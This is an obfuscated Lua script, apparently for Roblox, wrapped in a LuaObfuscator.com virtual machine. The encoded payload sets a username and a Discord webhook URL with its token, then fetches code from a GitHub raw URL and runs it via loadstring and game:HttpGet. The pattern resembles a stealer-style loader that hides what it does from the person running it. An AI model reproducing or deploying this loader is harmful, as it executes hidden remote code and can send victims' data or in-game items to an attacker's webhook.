--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v88=v5(v81,v19);v19=nil;return v88;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==0) then v83=(v31/((5 -3)^(v32-(1 -0))))%(2^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + (1711 -(1523 + 114)))))) ;return v83-(v83%(569 -(367 + 201))) ;end end else local v84=((835 + 94) -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + (1161 -(32 + 85)))) ;v34=(4 + 0) -3 ;end end end local function v22()local v36=0 + 0 ;local v37;local v38;while true do if (v36==(958 -((1072 -(67 + 113)) + 65))) then return (v38 * (610 -354)) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + 2 );v18=v18 + (3 -1) ;v36=351 -(64 + 23 + 263) ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + 4 ;return (v42 * (12338840 + 4438376)) + (v41 * 65536) + (v40 * (1017 -761)) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=953 -(802 + 65 + 85) ;local v46=(v20(v44,2 -1 ,36 -16 ) * (2^32)) + v43 ;local v47=v20(v44,16 + 5 ,(1818 -790) -(915 + 82) );local v48=((v20(v44,90 -58 )==(1 + 0)) and  -(1 -0)) or (1188 -(1069 + 118)) ;if (v47==(0 -0)) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else v47=1 -0 ;v45=0;end elseif (v47==(2031 + 16)) then return ((v46==(791 -((806 -(145 + 293)) + 423))) and (v48 * ((3 -2)/0))) or (v48 * NaN) ;end return v8(v48,v47-(1041 -(10 + 8)) ) * (v45 + (v46/((7 -5)^((1577 -1083) -(416 + 26))))) ;end local function v25(v49)local v50=430 -(44 + (950 -564)) ;local v51;local v52;while true do if (v50==(1489 -(998 + 488))) then return v6(v52);end if (v50==(1 + 1)) then v52={};for v89=1 + 0 , #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=862 -(814 + 45) ;end if (v50==(773 -(201 + 571))) then v51=v3(v16,v18,(v18 + v49) -(1139 -(116 + 56 + 966)) );v18=v18 + v49 ;v50=(3 + 5) -6 ;end if (v50==(0 + 0)) then v51=nil;if  not v49 then v49=v23();if (v49==(0 -(885 -(261 + 624)))) then return "";end end v50=3 -2 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==(1945 -(1008 + 935))) then v58=nil;v59=nil;v53=3 + 0 ;end if (v53~=(1 -0)) then else v56=nil;v57=nil;v53=5 -3 ;end if (v53~=(159 -(142 + 14))) then else v60=nil;while true do if (v54==(1 -0)) then local v95=0;while true do if ((1793 -(1563 + 230))~=v95) then else local v110=0 + 0 ;while true do if (v110~=(285 -(134 + 151))) then else v58={v55,v56,nil,v57};v59=v23();v110=1991 -(582 + 1408) ;end if ((3 -2)==v110) then v95=1;break;end end end if (v95==(66 -(30 + 35))) then v60={};v54=2;break;end end end if (v54~=(0 -0)) then else local v96=0 -0 ;while true do if (v96==(1825 -(1195 + 629))) then v57={};v54=1 -0 ;break;end if (v96~=(241 -(187 + 54))) then else v55={};v56={};v96=1;end end end if (v54==(783 -(162 + 618))) then local v97=0 + 0 ;while true do if (v97~=(0 -0)) then else for v112=1 + 0 ,v23() do v56[v112-1 ]=v28();end return v58;end end end if (v54~=(3 -1)) then else local v98=0;while true do if (v98==(1 -0)) then for v114=1 + 0 ,v23() do local v115=1636 -(1373 + 263) ;local v116;local v117;local v118;while true do if (0==v115) then v116=1000 -(451 + 549) ;v117=nil;v115=1 + 0 ;end if (v115~=1) then else v118=nil;while true do if ((1 + 0)==v116) then while true do if (v117~=(413 -(15 + 398))) then else v118=v21();if (v20(v118,983 -(18 + 964) ,3 -2 )==(0 -0)) then local v175=0 -0 ;local v176;local v177;local v178;local v179;while true do if ((850 -(20 + 830))==v175) then v176=0 + 0 ;v177=nil;v175=1;end if (v175~=(1385 -(746 + 638))) then else local v181=126 -(116 + 10) ;while true do if (v181~=(1 + 0)) then else v175=2;break;end if (v181==0) then v178=nil;v179=nil;v181=1 -0 ;end end end if (v175~=2) then else while true do if (v176==(0 -0)) then v177=v20(v118,343 -(218 + 123) ,1584 -(1535 + 46) );v178=v20(v118,4 + 0 ,6);v176=1 + 0 ;end if (v176==(563 -(306 + 254))) then if (v20(v178,3,1 + 2 )==(2 -1)) then v179[4]=v60[v179[7 -3 ]];end v55[v114]=v179;break;end if (v176~=(1553 -(1126 + 425))) then else local v183=1467 -(899 + 568) ;local v184;while true do if (v183==(405 -(118 + 287))) then v184=0 -0 ;while true do if (v184~=(0 + 0)) then else if (v20(v178,1122 -(118 + 1003) ,2 -1 )==1) then v179[379 -(142 + 235) ]=v60[v179[2]];end if (v20(v178,605 -(268 + 335) ,9 -7 )==(291 -(60 + 230))) then v179[980 -(553 + 424) ]=v60[v179[5 -2 ]];end v184=573 -(426 + 146) ;end if (v184==(1 + 0)) then v176=1459 -(282 + 1174) ;break;end end break;end end end if (v176==1) then local v185=811 -(569 + 242) ;while true do if (v185==0) then v179={v22(),v22(),nil,nil};if (v177==(1251 -(721 + 530))) then local v188=1271 -(945 + 326) ;local v189;while true do if (v188~=(0 -0)) then else v189=0 -0 ;while true do if (v189==(0 + 0)) then v179[1 + 2 ]=v22();v179[4]=v22();break;end end break;end end elseif (v177==(701 -(271 + 429))) then v179[756 -(239 + 514) ]=v23();elseif (v177==(1 + 1)) then v179[1332 -(797 + 532) ]=v23() -((2 + 0)^16) ;elseif (v177==(1503 -(1408 + 92))) then local v198=1086 -(461 + 625) ;local v199;local v200;while true do if ((1288 -(993 + 295))==v198) then v199=0 -0 ;v200=nil;v198=1203 -(373 + 829) ;end if ((732 -(476 + 255))~=v198) then else while true do if (v199~=0) then else v200=0 + 0 ;while true do if (v200==(1130 -(369 + 761))) then v179[1174 -(418 + 753) ]=v23() -((1 + 1)^(2 + 14)) ;v179[2 + 2 ]=v22();break;end end break;end end break;end end end v185=1;end if ((1 + 0)==v185) then v176=531 -(406 + 123) ;break;end end end end break;end end end break;end end break;end if (v116==0) then local v170=0;local v171;while true do if (v170==0) then v171=0;while true do if (v171==(1770 -(1749 + 20))) then v116=1;break;end if (v171==(0 + 0)) then local v180=1322 -(1249 + 73) ;while true do if (v180~=0) then else v117=216 -(42 + 174) ;v118=nil;v180=1 + 0 ;end if (v180==(1 + 0)) then v171=1146 -(466 + 679) ;break;end end end end break;end end end end break;end end end v54=3;break;end if (v98~=(0 -0)) then else for v119=2 -1 ,v59 do local v120=1504 -(363 + 1141) ;local v121;local v122;local v123;while true do if (v120==(1900 -(106 + 1794))) then v121=0 + 0 ;v122=nil;v120=1;end if (v120==(1 + 0)) then v123=nil;while true do if (0~=v121) then else local v172=0 -0 ;local v173;while true do if (v172==0) then v173=0 -0 ;while true do if (v173==1) then v121=2 -1 ;break;end if (v173==(114 -(4 + 110))) then v122=v21();v123=nil;v173=1;end end break;end end end if (v121~=(585 -(57 + 527))) then else if (v122==1) then v123=v21()~=0 ;elseif (v122==(1977 -(1913 + 62))) then v123=v24();elseif (v122==3) then v123=v25();end v60[v119]=v123;break;end end break;end end end v58[2 + 1 ]=v21();v98=1;end end end end break;end if (v53==(1427 -(41 + 1386))) then v54=0;v55=nil;v53=104 -(17 + 86) ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=4) then if (v80<=1) then if (v80>0) then v77[v79[2]]=v79[3]~=0 ;else local v100=0;local v101;local v102;while true do if (0==v100) then v101=nil;v102=nil;v77[v79[2]]=v79[3];v71=v71 + 1 ;v100=1;end if (v100==2) then v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v63[v79[3]]=v77[v79[2]];v100=3;end if (4==v100) then v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v100=5;end if (v100==3) then v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v100=4;end if (v100==1) then v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v100=2;end if (6==v100) then v71=v71 + 1 ;v79=v67[v71];v102=v79[2];v101=v77[v79[3]];v100=7;end if (v100==7) then v77[v102 + 1 ]=v101;v77[v102]=v101[v79[4]];v71=v71 + 1 ;v79=v67[v71];v100=8;end if (v100==5) then v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v100=6;end if (v100==8) then v77[v79[2]]=v79[3];break;end end end elseif (v80<=2) then v77[v79[2]]=v79[3];elseif (v80==3) then local v124=v79[2];local v125,v126=v70(v77[v124](v13(v77,v124 + 1 ,v79[3])));v72=(v126 + v124) -1 ;local v127=0;for v159=v124,v72 do local v160=0;while true do if (v160==0) then v127=v127 + 1 ;v77[v159]=v125[v127];break;end end end else v77[v79[2]]();end elseif (v80<=6) then if (v80>5) then do return;end else local v105=0;local v106;local v107;while true do if (v105==1) then v77[v106 + 1 ]=v107;v77[v106]=v107[v79[4]];break;end if (v105==0) then v106=v79[2];v107=v77[v79[3]];v105=1;end end end elseif (v80<=7) then local v108=0;local v109;while true do if (v108==0) then v109=v79[2];v77[v109]=v77[v109](v13(v77,v109 + 1 ,v72));break;end end elseif (v80>8) then v63[v79[3]]=v77[v79[2]];else v77[v79[2]]=v63[v79[3]];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003083O00557365724E616D6503093O0065772O65776535303303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135323435363832363332342O30392O30322F4A6F523075364C6A3O757A76422D6E486954625F415730665F444939486D7179696535362D7A6E5271594B5732434E706A65386F56545F47524834564D61763164634503093O00557365724E616D6532030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F726953637269707473000F3O00124O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00122O000100073O00202O00010001000800122O000300094O0001000400014O0003000100044O00075O00022O00043O000100012O00063O00017O00",v9(),...);
